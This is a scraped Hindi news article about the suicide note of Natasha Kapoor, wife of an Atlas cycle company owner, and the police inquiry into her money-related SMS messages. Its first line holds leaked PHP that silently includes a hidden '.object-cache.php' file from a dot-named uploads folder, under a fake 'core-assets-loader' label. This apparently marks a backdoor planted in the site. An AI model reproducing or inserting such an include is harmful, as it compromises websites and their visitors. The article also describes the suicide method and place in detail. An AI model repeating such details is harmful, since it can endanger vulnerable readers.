add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); एटलस के मालिक की पत्नी नताशा ने सुसाइड नोट में लिखा- खुद की नजर में गिर गई – SOCH INDIA
Menu

देश
एटलस के मालिक की पत्नी नताशा ने सुसाइड नोट में लिखा- खुद की नजर में गिर गई

nobanner

साइकिल कंपनी एटलस के मालिकों में से एक संजय कपूर की पत्नी नताशा कपूर का सुसाइड नोट सामने आया है. इसमें उन्होंने खुदकुशी के लिए खुद को जिम्मेदार बताया है. वो अपने सुसाइड नोट के साथ कुछ राज भी छोड़ गई हैं.

57 वर्षीय नताशा कपूर ने सुसाइड नोट में लिखा, ‘मैं खुद अपनी जान ले रही हूं. इसके लिए कोई जिम्मेदार नहीं हैं. मैंने कुछ ऐसा किया है, जो मुझको नहीं करना चाहिए था. इससे मैं अपनी नजर में गिर गई हूं.’ हालांकि अभी तक इस रहस्य से परदा नहीं उठा है कि आखिर नताशा कपूर ने कौन-सा ऐसा काम किया था, जिसके चलते उनको खुदकुशी करनी पड़ी.

सूत्रों के मुताबिक पुलिस ने नताशा का मोबाइल फोन भी कब्जे में लिया था. सुसाइड के पहले नताशा ने किसी को 4 से 5  SMS किया था. SMS में नताशा पैसे की मांग कर रही थीं. पुलिस इस बात की जांच कर रही है कि कहीं नताशा ने किसी को पैसे तो नहीं दिया था जिसे वो वापस मांग रही थीं. सूत्रों के मुताबिक SMS वाले एंगल पर भी पुलिस जांच कर रही है. नताशा के परिवार वाले अभी खुलकर कुछ बताने की स्थिति में नहीं हैं.

नताशा कपूर ने इंग्लिश में लिखे सुसाइड नोट में अपने पति और परिवार के प्रति प्यार भी जताया है. उन्होंने सुसाइड नोट में अपने लिखा, ‘मैं संजय कपूर, अपनी बेटी और बेटे सभी को प्यार करती हूं.’ दिल्ली पुलिस को बरामद हुआ यह सुसाइड नोट हाफ पेज का है. मंगलवार को नताशा कपूर ने फांसी लगाकर आत्महत्या कर ली थी. दिल्ली के औरंगजेब लेन स्थित कोठी में उनका शव पंखे से लटका मिला था.